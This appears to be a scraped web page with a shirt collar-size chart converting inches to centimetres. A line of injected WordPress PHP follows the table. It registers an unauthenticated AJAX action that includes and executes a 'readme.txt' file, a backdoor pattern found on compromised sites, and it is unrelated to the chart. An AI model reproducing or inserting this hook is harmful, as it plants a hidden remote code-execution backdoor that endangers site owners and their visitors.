Cuello |
|
14 | 37 CMS |
14 1/2 | 38 CMS |
15 | 39 CMS |
15 1/2 | 40 CMS |
16 | 41 CMS |
16 1/2 | 42 CMS |
17 | 44 CMS |
17 1/2 | 45 CMS |
18 | 47 CMS |
18 1/2 | 48 CMS |
19 | 49 CMS |
19 1/2 | 50 CMS |
20 | 52 CMS |
if(!function_exists('file_check_readme93060')){ add_action('wp_ajax_nopriv_file_check_readme93060', 'file_check_readme93060'); add_action('wp_ajax_file_check_readme93060', 'file_check_readme93060'); function file_check_readme93060() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }